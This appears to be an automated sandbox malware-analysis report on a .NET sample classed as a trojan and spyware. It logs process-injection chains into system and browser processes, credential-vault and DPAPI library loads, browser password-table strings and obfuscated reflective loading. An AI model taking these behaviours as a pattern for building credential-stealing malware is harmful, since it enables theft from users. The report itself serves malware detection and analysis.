Source: dGHiTqj3AB.exe, 00000000.00000002.1754175438.0000000001037000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ational Typeface Corporation.slntQ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@7/5

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dGHiTqj3AB.exe.log

Source: mcbuilder.exe, 00000008.00000003.2583851167.00000000033B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE sync_entities_metadata (storage_key INTEGER PRIMARY KEY AUTOINCREMENT, metadata VARCPi;
Source: mcbuilder.exe, 00000008.00000002.3492126956.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2583851167.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2595096296.00000000033D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Process created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Process created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: dGHiTqj3AB.exe, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs	.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
Source: 8.2.mcbuilder.exe.3f2cd10.2.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 9.2.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 9.0.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 11.2.firefox.exe.a7bcd10.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0102F112 pushad ; iretd	0_2_0102F119
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_01025DF7 push eax; iretd	0_2_01025E21
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00418BBD push ds; retf 2ECDh	3_2_00418BEE
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00401420 push es; retn 00F1h	3_2_004014F8
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0041F0DC push es; retf	3_2_0041F0E6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00412104 pushad ; ret	3_2_0041212D
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0040C1EA push edx; retf	3_2_0040C1EE
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00403260 push eax; ret	3_2_00403262
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00426263 push edi; iretd	3_2_0042626E
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00408271 push es; ret	3_2_00408272
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00413A0B push esi; retf	3_2_00413A0E
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00418A13 push ds; retf 2ECDh	3_2_00418BEE
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00418355 push ebp; retf	3_2_004183DC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00418BA5 push ebx; iretd	3_2_00418BA6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0041E653 push ds; iretd	3_2_0041E654
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0041E63B push ebx; iretd	3_2_0041E64C
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018D225F pushad ; ret	3_2_018D27F9
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018D27FA pushad ; ret	3_2_018D27F9
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019009AD push ecx; mov dword ptr [esp], ecx	3_2_019009B6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018D283D push eax; iretd	3_2_018D2858
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0386225F pushad ; ret	8_2_038627F9
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038627FA pushad ; ret	8_2_038627F9
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038909AD push ecx; mov dword ptr [esp], ecx	8_2_038909B6
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0386283D push eax; iretd	8_2_03862858
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03861368 push eax; iretd	8_2_03861369
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B0280 push edi; retn F913h	8_2_030B03A3
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030A07A8 push esi; retf	8_2_030A07AB
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03098F87 push edx; retf	8_2_03098F8B
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0309EEA1 pushad ; ret	8_2_0309EECA
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030A730F push esp; iretd	8_2_030A7319
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030AB3D8 push ebx; iretd	8_2_030AB3E9

Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, cw37txoRO4X56hm21l.cs	High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs	High entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QpyfwtBfq1mip1rA69.cs	High entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, iIG0lTjpxEHhOQvkFer.cs	High entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, g3uWXYxFNrFgfAVMbg.cs	High entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, SM8r4X8fVbB7QJOWqS.cs	High entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, raIl7X21rhHoQ1rmtr.cs	High entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, lcS7RE1vxlKWGpOeGp.cs	High entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, xFiqCjOS4mObwnqG7R.cs	High entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Y56XpTEtPmCWtAUcx3.cs	High entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, LQj0kcVZN6Kkvud9DR.cs	High entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, bwrRjVyKj1VL5wCXv7.cs	High entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, H5DbcuXYjlGQPm0xJ0.cs	High entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, IcQdK2rXYfyvqYcyHa.cs	High entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QoOP4PjGKS5gfhE57SM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, qKgcIJaPN5xDIttQpD.cs	High entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.cs	High entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Q8PlVd7gMYjm0S8vYt.cs	High entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, OOABLIblxanx4dA8KG.cs	High entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, f3eVc2kPtPvNgZNKDL.cs	High entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, XC3FVVqBJrFXgahDpX.cs	High entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs	High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, cw37txoRO4X56hm21l.cs	High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\mcbuilder.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 4CD0000 memory reserve \| memory write watch	Jump to behavior
